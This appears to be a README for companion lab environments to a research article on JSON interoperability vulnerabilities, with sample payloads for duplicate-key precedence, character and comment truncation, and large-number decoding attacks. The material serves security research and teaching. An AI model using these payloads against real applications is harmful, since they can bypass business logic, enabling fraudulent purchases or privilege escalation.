JSON Interoperability Vulnerability Labs
Description
These are the companion labs to my research article "An Exploration of JSON Interoperability Vulnerabilities".
Lab 1: Free purchases in an E-commerce Application
- Key Collision Attacks: Inconsistent Duplicate Key Precedence
- Inconsistent Large Number Representations
Lab 2: Privilege Escalation in a Multi-tenant Application
- Key Collision Attacks: Character Truncation
These labs bind to host ports 5000-5004, by default.
Attack Techniques
1. Key Collisions
Inconsistent Duplicate Key Precedence
{"qty": 1, "qty": -1}
Character Truncation
Truncation in last-key precedence parsers (flip order for first-key precedence)
{"qty": 1, "qty\<raw \x0d byte here>": -1}
{"qty": 1, "qty\ud800": -1} # Any unpaired surrogate U+D800-U+DFFF
{"qty": 1, "qty"": -1}
{"qty": 1, "qt\y": -1}
Comment Truncation
These documents take advantage of inconsistent support of comments and quote-less string support:
{"qty": 1, "extra": 1/*, "qty": -1, "extra2": 2*/}
{"qty": 1, "extra": a/*, "qty": -1, "extra2": b*/}
{"qty": 1, "extra": "a/*", "qty": -1, "extra2": "b"*/}
{"qty": 1, "extra": "a"//, "qty": -1}
2. Number Decoding
Inconsistent Large Number Decoding
These large numeric values may be converted to Strings (e.g., "+Infinity"), which may lead to type-juggling vulnerabilities. Or, they may be converted to MAX_INT/MIN_INT, rounded values, or 0, which may allow a bypass of business logic.
{"qty": 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999}
{"qty": -999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999}
{"qty": 1.0e4096}
{"qty": -1.0e4096}
Author
Twitter: @theBumbleSec
GitHub: the-bumble